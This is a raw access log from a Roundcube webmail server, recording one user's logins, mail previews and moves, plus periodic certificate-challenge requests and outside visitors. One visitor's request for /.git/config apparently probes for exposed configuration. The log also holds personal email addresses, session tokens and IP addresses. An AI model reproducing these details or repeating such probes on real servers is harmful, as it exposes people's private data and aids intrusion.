[Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:52:17 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771365137042" [Client 222.117.41.51] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:52:20 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=1&_remote=1&_unlock=loading1771365140242&_=1771365137043" [Client 222.117.41.51] [Length 3780] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:52:28 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_layout=widescreen&_mbox=INBOX&_page=1&_remote=1&_unlock=loading1771365148019&_=1771365137044" [Client 222.117.41.51] [Length 4253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:52:43 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 921] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:52:49 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_mbox=INBOX" [Client 222.117.41.51] [Length 11663] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:52:49 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771365169311" [Client 222.117.41.51] [Length 168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:52:49 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771365169345&_=1771365169310" [Client 222.117.41.51] [Length 3598] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:53:49 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 153] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:54:49 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 153] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:55:49 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 153] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:22:31:13 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/1185790923909" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[17/Feb/2026:23:31:39 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/8643163407278" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:00:32:01 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/985854727990" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:01:32:23 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/30312320418403" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:02:32:47 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/5977297493722" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:02:59:49 +0000] - - 301 - GET http mail.hanmocnn.co.kr "/" [Client 209.97.155.138] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[18/Feb/2026:02:59:50 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/rc/" [Client 209.97.155.138] [Length 2274] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[18/Feb/2026:02:59:51 +0000] - - 301 - GET https mail.hanmocnn.co.kr "/" [Client 209.97.155.138] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[18/Feb/2026:02:59:57 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 209.97.155.138] [Length 2274] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[18/Feb/2026:03:33:13 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/66232682630494" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:04:33:38 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/19312097525391" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:05:34:01 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/13353443411800" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:06:10:28 +0000] - - 301 - GET https mail.hanmocnn.co.kr "/" [Client 195.178.110.242] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[18/Feb/2026:06:10:30 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 195.178.110.242] [Length 5345] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[18/Feb/2026:06:10:31 +0000] - - 301 - GET https mail.hanmocnn.co.kr "/" [Client 195.178.110.242] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[18/Feb/2026:06:10:33 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 195.178.110.242] [Length 5345] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[18/Feb/2026:06:10:36 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.git/config" [Client 195.178.110.242] [Length 146] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0" "-" +[18/Feb/2026:06:10:37 +0000] - - 301 - GET https mail.hanmocnn.co.kr "/" [Client 195.178.110.242] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "-" "-" +[18/Feb/2026:06:10:40 +0000] - - 301 - GET https mail.hanmocnn.co.kr "/" [Client 195.178.110.242] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[18/Feb/2026:06:10:41 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 195.178.110.242] [Length 5345] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[18/Feb/2026:06:10:42 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=login" [Client 195.178.110.242] [Length 5356] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[18/Feb/2026:06:34:23 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/76892721029507" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:07:34:47 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/749408432210" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:10:36:09 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/29692719730346" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:11:36:34 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/302411196212851" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:12:36:57 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/16296355028267" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:13:37:20 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/28058106558622" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:14:37:43 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/25402311981443" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:15:38:05 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/2010270943770" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:16:38:31 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/19835181027399" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:17:38:54 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/13394307029520" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:18:38:55 +0000] - - 301 - GET https mail.hanmocnn.co.kr "/" [Client 54.82.229.81] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.0.0 Safari/537.36" "-" +[18/Feb/2026:18:38:56 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 54.82.229.81] [Length 2275] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.0.0 Safari/537.36" "-" +[18/Feb/2026:18:39:22 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/296711207917157" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:18:57:50 +0000] - - 301 - GET http mail.hanmocnn.co.kr "/" [Client 100.49.142.153] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" "-" +[18/Feb/2026:18:57:51 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/rc/" [Client 100.49.142.153] [Length 2272] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" "-" +[18/Feb/2026:19:39:45 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/4540805912569" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:20:28:35 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:28:38 +0000] - 302 302 - POST https mail.hanmocnn.co.kr "/rc/?_task=login" [Client 222.117.41.51] [Length 5] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:28:38 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_token=uGhqugh9LbQH64DtMCkpDUQVIkfU0h8Y" [Client 222.117.41.51] [Length 11623] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:28:38 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771446518595" [Client 222.117.41.51] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:28:38 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771446518651&_=1771446518594" [Client 222.117.41.51] [Length 3721] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:28:41 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=14536&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 6097] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:28:41 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=no-reply%40accounts.google.com&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:28:47 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 737] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:28:47 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=14475&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 5187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:28:47 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=bogang.park%40hanmocnn.co.kr&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:28:58 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=14474&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 5215] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:28:58 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 712] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:29:01 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=14472&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4907] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:29:01 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=citecta%40naver.com&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:29:01 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:29:08 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=14473&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4652] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:29:08 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=windpacer%40hanmocnn.co.kr&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:29:08 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:29:12 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=14471&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4878] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:29:13 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 680] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:29:15 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13801&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 5490] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:29:15 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 701] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:29:20 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=14470&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 5641] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:29:20 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:29:20 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=support%40emailjs.com&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:29:23 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 697] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:29:23 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13279&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 10283] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:29:23 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=noreply%40flyasiana.com&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:40:09 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/8014472331921" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:20:54:38 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:54:41 +0000] - 302 302 - POST https mail.hanmocnn.co.kr "/rc/?_task=login" [Client 222.117.41.51] [Length 5] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:54:41 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_token=saMFaoGNg375BfWNWJ1B1GW2q5XK3TpP" [Client 222.117.41.51] [Length 11622] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:54:41 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771448081436" [Client 222.117.41.51] [Length 367] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[18/Feb/2026:20:54:41 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771448081478&_=1771448081435" [Client 222.117.41.51] [Length 3715] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" 